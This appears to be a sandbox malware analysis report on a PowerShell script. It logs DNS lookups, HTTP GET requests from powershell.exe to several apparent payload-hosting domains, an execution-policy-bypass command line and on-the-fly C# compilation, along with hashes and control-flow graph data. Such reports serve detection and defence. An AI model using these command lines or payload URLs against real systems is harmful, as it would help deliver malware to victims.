                                                      Nov 22, 2024 09:22:31.072463989 CET8049705198.185.159.145192.168.2.5
                                                      Nov 22, 2024 09:22:31.072643042 CET4970580192.168.2.5198.185.159.145
                                                      Nov 22, 2024 09:22:31.072973013 CET4970580192.168.2.5198.185.159.145
                                                      Nov 22, 2024 09:22:31.192519903 CET8049705198.185.159.145192.168.2.5
                                                      Nov 22, 2024 09:22:32.210594893 CET8049705198.185.159.145192.168.2.5
                                                      Nov 22, 2024 09:22:32.210621119 CET8049705198.185.159.145192.168.2.5
                                                      Nov 22, 2024 09:22:32.210700989 CET4970580192.168.2.5198.185.159.145
                                                      Nov 22, 2024 09:22:35.886972904 CET4970480192.168.2.5162.43.104.133
                                                      Nov 22, 2024 09:22:36.007235050 CET8049704162.43.104.133192.168.2.5
                                                      Nov 22, 2024 09:22:36.007303953 CET4970480192.168.2.5162.43.104.133
                                                      Nov 22, 2024 09:23:02.211257935 CET8049705198.185.159.145192.168.2.5
                                                      Nov 22, 2024 09:23:02.211493015 CET4970580192.168.2.5198.185.159.145
                                                      Nov 22, 2024 09:23:35.163300037 CET4970580192.168.2.5198.185.159.145
                                                      Nov 22, 2024 09:23:35.283138990 CET8049705198.185.159.145192.168.2.5
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Nov 22, 2024 09:22:28.333642960 CET5900753192.168.2.51.1.1.1
                                                      Nov 22, 2024 09:22:28.878793001 CET53590071.1.1.1192.168.2.5
                                                      Nov 22, 2024 09:22:28.920855045 CET5192953192.168.2.51.1.1.1
                                                      Nov 22, 2024 09:22:29.058340073 CET53519291.1.1.1192.168.2.5
                                                      Nov 22, 2024 09:22:29.060431004 CET4957353192.168.2.51.1.1.1
                                                      Nov 22, 2024 09:22:29.197916031 CET53495731.1.1.1192.168.2.5
                                                      Nov 22, 2024 09:22:30.813241959 CET5941653192.168.2.51.1.1.1
                                                      Nov 22, 2024 09:22:30.951271057 CET53594161.1.1.1192.168.2.5
                                                      Nov 22, 2024 09:22:32.212975979 CET6363353192.168.2.51.1.1.1
                                                      Nov 22, 2024 09:22:32.351496935 CET53636331.1.1.1192.168.2.5
                                                      Nov 22, 2024 09:22:35.886518955 CET6542853192.168.2.51.1.1.1
                                                      Nov 22, 2024 09:22:36.024816036 CET53654281.1.1.1192.168.2.5
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Nov 22, 2024 09:22:28.333642960 CET192.168.2.51.1.1.10x5092Standard query (0)habarimoto24.comA (IP address)IN (0x0001)false
                                                      Nov 22, 2024 09:22:28.920855045 CET192.168.2.51.1.1.10x8b22Standard query (0)fenett2018.comA (IP address)IN (0x0001)false
                                                      Nov 22, 2024 09:22:29.060431004 CET192.168.2.51.1.1.10xff0bStandard query (0)eastend.jpA (IP address)IN (0x0001)false
                                                      Nov 22, 2024 09:22:30.813241959 CET192.168.2.51.1.1.10x5025Standard query (0)bemnyc.comA (IP address)IN (0x0001)false
                                                      Nov 22, 2024 09:22:32.212975979 CET192.168.2.51.1.1.10xece6Standard query (0)abakus-biuro.netA (IP address)IN (0x0001)false
                                                      Nov 22, 2024 09:22:35.886518955 CET192.168.2.51.1.1.10xf6c6Standard query (0)yourmother4cancer.infoA (IP address)IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Nov 22, 2024 09:22:28.878793001 CET1.1.1.1192.168.2.50x5092Server failure (2)habarimoto24.comnonenoneA (IP address)IN (0x0001)false
                                                      Nov 22, 2024 09:22:29.058340073 CET1.1.1.1192.168.2.50x8b22Name error (3)fenett2018.comnonenoneA (IP address)IN (0x0001)false
                                                      Nov 22, 2024 09:22:29.197916031 CET1.1.1.1192.168.2.50xff0bNo error (0)eastend.jp162.43.104.133A (IP address)IN (0x0001)false
                                                      Nov 22, 2024 09:22:30.951271057 CET1.1.1.1192.168.2.50x5025No error (0)bemnyc.com198.185.159.145A (IP address)IN (0x0001)false
                                                      Nov 22, 2024 09:22:30.951271057 CET1.1.1.1192.168.2.50x5025No error (0)bemnyc.com198.185.159.144A (IP address)IN (0x0001)false
                                                      Nov 22, 2024 09:22:30.951271057 CET1.1.1.1192.168.2.50x5025No error (0)bemnyc.com198.49.23.145A (IP address)IN (0x0001)false
                                                      Nov 22, 2024 09:22:30.951271057 CET1.1.1.1192.168.2.50x5025No error (0)bemnyc.com198.49.23.144A (IP address)IN (0x0001)false
                                                      Nov 22, 2024 09:22:32.351496935 CET1.1.1.1192.168.2.50xece6Name error (3)abakus-biuro.netnonenoneA (IP address)IN (0x0001)false
                                                      Nov 22, 2024 09:22:36.024816036 CET1.1.1.1192.168.2.50xf6c6Name error (3)yourmother4cancer.infononenoneA (IP address)IN (0x0001)false
                                                      • eastend.jp
                                                      • bemnyc.com
                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.549704162.43.104.133806404C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 22, 2024 09:22:29.326545000 CET66OUTGET /bl5kfa HTTP/1.1
                                                      Host: eastend.jp
                                                      Connection: Keep-Alive
                                                      Nov 22, 2024 09:22:30.806360006 CET1236INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Fri, 22 Nov 2024 08:22:30 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 2814
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 25 Jul 2023 10:28:06 GMT
                                                      ETag: "afe-6014d2fcf5ab8"
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="ja"><head><meta charset="EUC-JP" /><title>404 File Not Found</title><meta name="copyright" content="Copyright XSERVER Inc."><meta name="robots" content="INDEX,FOLLOW" /><meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0"><style type="text/css">* { margin: 0; padding: 0;}img { border: 0;}ul { padding-left: 2em;}html { overflow-y: scroll; background: #3b79b7;}body { font-family: "", Meiryo, " ", "MS PGothic", " Pro W3", "Hiragino Kaku Gothic Pro", sans-serif; margin: 0; line-height: 1.4; font-size: 75%; text-align: center; color: white;}h1 { font-size: 24px; font-weight: bold;}h1 { font-weight: bold; line-height: 1; padding-bottom: 20px; font-family: Helvetica, sans-serif;}h2 { text-align: center; font-weight: bold; font-size: 27px;}p { text-align: center; font-size: 14
                                                      Nov 22, 2024 09:22:30.806425095 CET1236INData Raw: 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 2e 65 78 70 6c 61 69 6e 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20
                                                      Data Ascii: px; margin: 0; padding: 0; color: white;}.explain { border-top: 1px solid #fff; border-bottom: 1px solid #fff; line-height: 1.5; margin: 30px auto; padding: 17px;}#cause { text-align: left;}#cause li {
                                                      Nov 22, 2024 09:22:30.806466103 CET587INData Raw: 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 62 61 73 65 22 3e 0a 20 20 20 20 3c 68 31 3e 3c 73 70 61 6e 3e 34 30 34 3c 2f 73 70 61 6e 3e 3c 62 72 20 2f 3e 0a 20 20 20 20 20 20 20 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 20 20
                                                      Data Ascii: dy><div id="base"> <h1><span>404</span><br /> File Not Found</h1> <h2></h2> <p class="explain"></p> <h3>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.549705198.185.159.145806404C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 22, 2024 09:22:31.072973013 CET68OUTGET /u8erijeq HTTP/1.1
                                                      Host: bemnyc.com
                                                      Connection: Keep-Alive
                                                      Nov 22, 2024 09:22:32.210594893 CET1236INHTTP/1.1 400 Bad Request
                                                      Cache-Control: no-cache, must-revalidate
                                                      Content-Length: 2061
                                                      Content-Type: text/html; charset=UTF-8
                                                      Date: Fri, 22 Nov 2024 08:22:32 UTC
                                                      Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                      Pragma: no-cache
                                                      Server: Squarespace
                                                      X-Contextid: gAEJa4JS/BB6fVomX
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 400; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 400; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span {
                                                      Nov 22, 2024 09:22:32.210621119 CET1105INData Raw: 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a
                                                      Data Ascii: margin: 0 11px; font-size: 1em; font-weight: 400; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 400; color: #191919; } @media (max-width: 600px) { body { font-family: "


                                                      Click to jump to process

                                                      Click to jump to process

                                                      Click to dive into process behavior distribution

                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:03:22:24
                                                      Start date:22/11/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1008.ps1"
                                                      Imagebase:0x7ff7be880000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:1
                                                      Start time:03:22:24
                                                      Start date:22/11/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:3
                                                      Start time:03:22:33
                                                      Start date:22/11/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xtxy3idj\xtxy3idj.cmdline"
                                                      Imagebase:0x7ff70d280000
                                                      File size:2'759'232 bytes
                                                      MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:4
                                                      Start time:03:22:33
                                                      Start date:22/11/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2CC0.tmp" "c:\Users\user\AppData\Local\Temp\xtxy3idj\CSCB2373C2DB48C49F0A0BD39442F2F8C98.TMP"
                                                      Imagebase:0x7ff7be1e0000
                                                      File size:52'744 bytes
                                                      MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:1.9%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:3
                                                        Total number of Limit Nodes:0
                                                        execution_graph 6900 7ff848dec45d 6901 7ff848dec485 CreateProcessA 6900->6901 6903 7ff848dec80f 6901->6903

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3598305363.00007FF848DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff848de0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: h__H
                                                        • API String ID: 0-4245872964
                                                        • Opcode ID: ce48b2d02b496ea0ff68e03a802662b7144308b3efb33650454419d7bff74c8f
                                                        • Instruction ID: 284b8155ee4e9933dd516c67be29a20b59483f5a036c6110598771d5c6a3d50e
                                                        • Opcode Fuzzy Hash: ce48b2d02b496ea0ff68e03a802662b7144308b3efb33650454419d7bff74c8f
                                                        • Instruction Fuzzy Hash: B2E1C330519E8D4FEB64EF28C8467F977E1FB59351F04422AE84DC7281DF78A9858B82

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3598305363.00007FF848DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff848de0000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID: h__H
                                                        • API String ID: 963392458-4245872964
                                                        • Opcode ID: 239597506721a24a359e69a24e208619dfe50ef8d7794de912b2253b83d3fb7a
                                                        • Instruction ID: 13b1436d6575234f229788d731d3f4f0786262b2621f1db43571aa99f864a814
                                                        • Opcode Fuzzy Hash: 239597506721a24a359e69a24e208619dfe50ef8d7794de912b2253b83d3fb7a
                                                        • Instruction Fuzzy Hash: 4DE1B130519E8D4FDB65EF28C8467F93BE1FB59311F04422AE84DC7291DF78A9858B82

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 94 7ff848eb4435-7ff848eb445a 95 7ff848eb44b3-7ff848eb44c4 94->95 96 7ff848eb445c-7ff848eb4478 94->96 98 7ff848eb44ca-7ff848eb44d4 95->98 99 7ff848eb472c-7ff848eb47eb 95->99 100 7ff848eb447a-7ff848eb4492 96->100 101 7ff848eb44dd-7ff848eb44e3 96->101 102 7ff848eb44d6-7ff848eb44d7 98->102 103 7ff848eb44ed-7ff848eb44f2 98->103 100->95 106 7ff848eb44dc 100->106 101->103 113 7ff848eb44e5-7ff848eb44eb 101->113 102->106 104 7ff848eb46d0-7ff848eb46da 103->104 105 7ff848eb44f8-7ff848eb44fb 103->105 109 7ff848eb46e9-7ff848eb4729 104->109 110 7ff848eb46dc-7ff848eb46e8 104->110 111 7ff848eb4512 105->111 112 7ff848eb44fd-7ff848eb4510 105->112 106->101 109->99 117 7ff848eb4514-7ff848eb4516 111->117 112->117 113->103 117->104 119 7ff848eb451c-7ff848eb4550 117->119 131 7ff848eb4552-7ff848eb4565 119->131 132 7ff848eb4567 119->132 133 7ff848eb4569-7ff848eb456b 131->133 132->133 133->104 135 7ff848eb4571-7ff848eb4579 133->135 135->99 137 7ff848eb457f-7ff848eb4589 135->137 138 7ff848eb45a5-7ff848eb45b5 137->138 139 7ff848eb458b-7ff848eb45a3 137->139 138->104 143 7ff848eb45bb-7ff848eb45ec 138->143 139->138 143->104 148 7ff848eb45f2-7ff848eb461e 143->148 152 7ff848eb4620-7ff848eb4647 148->152 153 7ff848eb4649 148->153 154 7ff848eb464b-7ff848eb464d 152->154 153->154 154->104 156 7ff848eb4653-7ff848eb465b 154->156 157 7ff848eb466b 156->157 158 7ff848eb465d-7ff848eb4667 156->158 161 7ff848eb4670-7ff848eb4685 157->161 159 7ff848eb4687-7ff848eb46a9 158->159 160 7ff848eb4669 158->160 165 7ff848eb46b0-7ff848eb46b6 159->165 160->161 161->159 166 7ff848eb46bd-7ff848eb46cf 165->166
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3599172462.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff848eb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a4ec3de4bee6b12ac36f426dc98f4519eaea2693739822c112a033b1d8d5d29e
                                                        • Instruction ID: 3bb49385e592af648a9c9a3cdbc5a6813d1be5c1bcefd82f32c5e58f2af0daae
                                                        • Opcode Fuzzy Hash: a4ec3de4bee6b12ac36f426dc98f4519eaea2693739822c112a033b1d8d5d29e
                                                        • Instruction Fuzzy Hash: 73C12231E0EA8A4FE795EB2858155B97BE1FF26398F0800FAD54CC7193DA38AC45C355

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 167 7ff848eb16ad-7ff848eb16f0 169 7ff848eb16f2-7ff848eb174f 167->169 170 7ff848eb1755-7ff848eb175f 167->170 173 7ff848eb1751-7ff848eb1752 169->173 174 7ff848eb1769-7ff848eb176f 169->174 170->174 175 7ff848eb1761-7ff848eb1767 170->175 173->170 176 7ff848eb1775-7ff848eb1778 174->176 177 7ff848eb190f-7ff848eb1919 174->177 175->174 181 7ff848eb177a-7ff848eb1783 176->181 182 7ff848eb178f-7ff848eb1793 176->182 178 7ff848eb191b-7ff848eb192b 177->178 179 7ff848eb192c-7ff848eb1977 177->179 181->182 182->177 185 7ff848eb1799-7ff848eb17d0 182->185 192 7ff848eb17d2-7ff848eb17f2 185->192 193 7ff848eb17f4 185->193 194 7ff848eb17f6-7ff848eb17f8 192->194 193->194 194->177 196 7ff848eb17fe-7ff848eb1801 194->196 198 7ff848eb1803-7ff848eb1816 196->198 199 7ff848eb1818 196->199 201 7ff848eb181a-7ff848eb181c 198->201 199->201 201->177 202 7ff848eb1822-7ff848eb1825 201->202 203 7ff848eb1827-7ff848eb1830 202->203 204 7ff848eb183c-7ff848eb1840 202->204 203->204 204->177 207 7ff848eb1846-7ff848eb1880 204->207 212 7ff848eb1882-7ff848eb188f 207->212 213 7ff848eb1899-7ff848eb189f 207->213 212->213 220 7ff848eb1891-7ff848eb1897 212->220 214 7ff848eb18a1-7ff848eb18b9 213->214 215 7ff848eb18bb-7ff848eb18c1 213->215 214->215 218 7ff848eb18c3-7ff848eb18db 215->218 219 7ff848eb18dd-7ff848eb18e3 215->219 218->219 223 7ff848eb18ea-7ff848eb18f2 219->223 220->213 226 7ff848eb18f4-7ff848eb18f8 223->226 227 7ff848eb18fa-7ff848eb18ff 223->227 228 7ff848eb1900-7ff848eb190e 226->228 227->228
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3599172462.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff848eb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 618f51840342b87076d9378e3d3e4d84e198797102f8424b0d4e069c8ae48b5c
                                                        • Instruction ID: 3d820df4ce0fbcfae23b2ce18254bedfde242d645008cce0efee6be39539edef
                                                        • Opcode Fuzzy Hash: 618f51840342b87076d9378e3d3e4d84e198797102f8424b0d4e069c8ae48b5c
                                                        • Instruction Fuzzy Hash: 48810731E1EB8A4FE799E62858552B537E1FF522A0F4801BEC44DC30D7EF29E805834A

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 230 7ff848eb1708-7ff848eb173f 232 7ff848eb1745-7ff848eb174f 230->232 233 7ff848eb197a-7ff848eb19a9 230->233 236 7ff848eb1751-7ff848eb175f 232->236 237 7ff848eb1769-7ff848eb176f 232->237 242 7ff848eb19b5-7ff848eb19d8 233->242 243 7ff848eb19ab-7ff848eb19b1 233->243 236->237 251 7ff848eb1761-7ff848eb1767 236->251 240 7ff848eb1775-7ff848eb1778 237->240 241 7ff848eb190f-7ff848eb1919 237->241 247 7ff848eb177a-7ff848eb1783 240->247 248 7ff848eb178f-7ff848eb1793 240->248 244 7ff848eb191b-7ff848eb192b 241->244 245 7ff848eb192c-7ff848eb1977 241->245 260 7ff848eb1a03-7ff848eb1a0f 242->260 261 7ff848eb19da-7ff848eb1a01 242->261 243->242 247->248 248->241 253 7ff848eb1799-7ff848eb17d0 248->253 251->237 269 7ff848eb17d2-7ff848eb17f2 253->269 270 7ff848eb17f4 253->270 265 7ff848eb1a1a-7ff848eb1a2b 260->265 261->260 271 7ff848eb1a34-7ff848eb1a43 265->271 272 7ff848eb1a2d 265->272 273 7ff848eb17f6-7ff848eb17f8 269->273 270->273 275 7ff848eb1a45 271->275 276 7ff848eb1a4c-7ff848eb1a78 271->276 272->271 273->241 278 7ff848eb17fe-7ff848eb1801 273->278 275->276 283 7ff848eb1a93-7ff848eb1a97 276->283 284 7ff848eb1a7a-7ff848eb1a80 276->284 281 7ff848eb1803-7ff848eb1816 278->281 282 7ff848eb1818 278->282 286 7ff848eb181a-7ff848eb181c 281->286 282->286 288 7ff848eb1a9b-7ff848eb1b00 283->288 287 7ff848eb1a82-7ff848eb1a92 284->287 284->288 286->241 289 7ff848eb1822-7ff848eb1825 286->289 287->283 290 7ff848eb1827-7ff848eb1830 289->290 291 7ff848eb183c-7ff848eb1840 289->291 290->291 291->241 297 7ff848eb1846-7ff848eb1880 291->297 307 7ff848eb1882-7ff848eb188f 297->307 308 7ff848eb1899-7ff848eb189f 297->308 307->308 315 7ff848eb1891-7ff848eb1897 307->315 309 7ff848eb18a1-7ff848eb18b9 308->309 310 7ff848eb18bb-7ff848eb18c1 308->310 309->310 313 7ff848eb18c3-7ff848eb18db 310->313 314 7ff848eb18dd-7ff848eb18e3 310->314 313->314 318 7ff848eb18ea-7ff848eb18f2 314->318 315->308 321 7ff848eb18f4-7ff848eb18f8 318->321 322 7ff848eb18fa-7ff848eb18ff 318->322 323 7ff848eb1900-7ff848eb190e 321->323 322->323
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3599172462.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff848eb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ab2cb8e847f95f0da7c36158c82040e7301d86e427571e1005a71eac9afa6cc6
                                                        • Instruction ID: 963b6f842c44520be784762224ac068f1455c7b612caf65c70b969c490742eac
                                                        • Opcode Fuzzy Hash: ab2cb8e847f95f0da7c36158c82040e7301d86e427571e1005a71eac9afa6cc6
                                                        • Instruction Fuzzy Hash: E871C221D0EBC91FE35AEB3858151713FE1FF636A0F0901FAD488C71A7DA2A6C468356

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 325 7ff848eb449c-7ff848eb44c4 328 7ff848eb44ca-7ff848eb44d4 325->328 329 7ff848eb472c-7ff848eb47eb 325->329 330 7ff848eb44d6-7ff848eb44e3 328->330 331 7ff848eb44ed-7ff848eb44f2 328->331 330->331 347 7ff848eb44e5-7ff848eb44eb 330->347 332 7ff848eb46d0-7ff848eb46da 331->332 333 7ff848eb44f8-7ff848eb44fb 331->333 336 7ff848eb46e9-7ff848eb4729 332->336 337 7ff848eb46dc-7ff848eb46e8 332->337 338 7ff848eb4512 333->338 339 7ff848eb44fd-7ff848eb4510 333->339 336->329 344 7ff848eb4514-7ff848eb4516 338->344 339->344 344->332 346 7ff848eb451c-7ff848eb4550 344->346 360 7ff848eb4552-7ff848eb4565 346->360 361 7ff848eb4567 346->361 347->331 362 7ff848eb4569-7ff848eb456b 360->362 361->362 362->332 364 7ff848eb4571-7ff848eb4579 362->364 364->329 366 7ff848eb457f-7ff848eb4589 364->366 367 7ff848eb45a5-7ff848eb45b5 366->367 368 7ff848eb458b-7ff848eb45a3 366->368 367->332 372 7ff848eb45bb-7ff848eb45ec 367->372 368->367 372->332 377 7ff848eb45f2-7ff848eb461e 372->377 381 7ff848eb4620-7ff848eb4647 377->381 382 7ff848eb4649 377->382 383 7ff848eb464b-7ff848eb464d 381->383 382->383 383->332 385 7ff848eb4653-7ff848eb465b 383->385 386 7ff848eb466b 385->386 387 7ff848eb465d-7ff848eb4667 385->387 390 7ff848eb4670-7ff848eb4685 386->390 388 7ff848eb4687-7ff848eb46b6 387->388 389 7ff848eb4669 387->389 395 7ff848eb46bd-7ff848eb46cf 388->395 389->390 390->388
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3599172462.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff848eb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 02e1e697428c9ee1ca7078174d9bb2783627cb377842d9e85cc24679ce780990
                                                        • Instruction ID: da76c823d96febe514d5f9c4ff957c660b9599658ecf5a143c88365215ae6dd0
                                                        • Opcode Fuzzy Hash: 02e1e697428c9ee1ca7078174d9bb2783627cb377842d9e85cc24679ce780990
                                                        • Instruction Fuzzy Hash: F971E131E1EA8A8FE7A5EB2854546787AE1FF25798F0800FAC54CC71D3DE39AC458349

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
